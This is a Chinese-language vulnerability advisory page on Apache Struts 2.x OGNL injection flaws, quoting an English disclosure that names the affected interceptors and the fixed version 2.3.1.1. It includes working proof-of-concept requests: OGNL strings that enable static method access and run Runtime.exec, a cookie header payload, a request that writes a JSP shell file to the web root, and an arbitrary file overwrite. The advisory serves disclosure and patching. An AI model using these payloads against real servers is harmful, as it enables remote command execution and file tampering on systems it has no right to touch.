漏洞起因
输入验证错误
危险等级
中
影响系统
Apache Struts 2.x
不受影响系统
危害
远程攻击者可以利用漏洞执行任意命令或覆盖任意文件。
攻击所需条件
攻击者必须访问Apache Struts。
漏洞信息
Apache Struts是一款建立Java web应用程序的开放源代码架构。
Apache Struts存在安全漏洞,允许攻击者利用漏洞执行任意命令或覆盖任意文件。
-Apache Struts存在一个输入过滤错误,如果遇到转换错误可被利用注入和执行任意Java代码。
-当处理COOKIE名称过程中CookieInterceptor类没有正确限制对某些静态模式的访问,可被利用执行任意命令。
-部分未明输入在用于创建文件之前没有由ParameterInterceptor进行正确过滤,可被利用通过目录遍历攻击创建或覆盖任意文件。
测试方法
Vulnerability overview/description: ----------------------------------- To prevent attackers calling arbitrary methods within parameters the flag "xwork.MethodAccessor.denyMethodExecution" is set to "true" and the SecurityMemberAccess field "allowStaticMethodAccess" is set to "false" by default. Also, to prevent access to context variables an improved character whitelist for paramteter names is applied in XWork's ParametersInterceptor since Struts 2.2.1.1: acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(\\)_'\\s]+"; Under certain circumstances these restrictions can be bypassed to execute malicious Java code. 1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator) When an exception occurs while applying parameter values to properties the value is evaluated as OGNL expression. For example this occurs when setting a string value to a property with type integer. Since the values are not filtered an attacker can abuse the power of the OGNL language to execute arbitrary Java code leading to remote command execution. This issue has been reported (https://issues.apache.org/jira/browse/WW-3668) and was fixed in Struts 2.2.3.1. However the ability to execute arbitrary Java code has been overlooked. 2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor) The character whitelist for parameter names is not applied to Struts CookieInterceptor. When Struts is configured to handle cookie names, an attacker can execute arbitrary system commands with static method access to Java functions. Therefore the flag "allowStaticMethodAccess" can be set to true within the request. 3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor) Accessing the flag "allowStaticMethodAccess" within parameters is prohibited since Struts 2.2.3.1. An attacker can still access public constructors with only one parameter of type String to create new Java objects and access their setters with only one parameter of type String. This can be abused for example to create and overwrite arbitrary files. To inject forbidden characters to the filename an uninitialized string property can be used. 4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor) While not being a security vulnerability itself, please note that applications running in developer mode and using Struts DebuggingInterceptor are prone to remote command execution as well. While applications should never run in developer mode during production, developers should be aware that doing so not only has performance issues (as documented) but also a critical security impact. Proof of concept: ----------------- 1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator) Given Test.java has an property "id" of type Integer or Long and appropriate getter and setter methods: long id; Given test.jsp with result name=input is configured for action "Test": struts.xml: <action name="Test"> <result name="input">test.jsp</result> </action> The following request will trigger an exception, the value will be evaluated as OGNL expression and arbitrary Java code can be executed: /Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b' An attacker can also overwrite flags that will allow direct OS command execution: /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b' If test.jsp displays the property "id" the result of the Java code evaluation can be accessed: <%@ taglib prefix="s" uri="/struts-tags" %> <s:property value="id" /> 2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor) Given struts.xml is configured to handle all cookie names (independent of limited cookie values): <action name="Test"> <interceptor-ref name="cookie"> <param name="cookiesName">*</param> <param name="cookiesValue">1,2</param> </interceptor-ref> <result ...> </action> The following HTTP header will execute an OS command when sent to Test.action: Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1 3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor) Given Test.java has an uninitialized property "name" of type String: String name; // +getter+setter The following request will create/overwrite the file "C:/sec-consult.txt" (empty file): /Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1 The existence of the property 'x' used in these examples is of no importance. 4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor) Given struts.xml is configured to run in developer mode and to use the debugging interceptor: <constant name="struts.devMode" value="true" /> <action name="Test"> <interceptor-ref name="debugging" /> <result ...> </action> The following request will execute arbitrary OGNL expressions leading to remote command execution: /Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
厂商解决方案
Apache Struts 2.3.1.1已经修复此漏洞,建议用户下载使用:
http://struts.apache.org/
漏洞提供者
Bruce Phillips and Johannes Dahse
评论关闭。